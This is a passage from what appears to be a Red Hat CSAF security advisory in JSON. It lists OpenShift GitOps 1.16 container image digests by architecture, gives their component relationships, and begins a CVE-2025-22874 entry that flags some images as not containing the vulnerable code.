"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3Ac7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64 as a component of Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.16"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-22874",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"discovery_date": "2025-06-11T17:00:48.521459+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
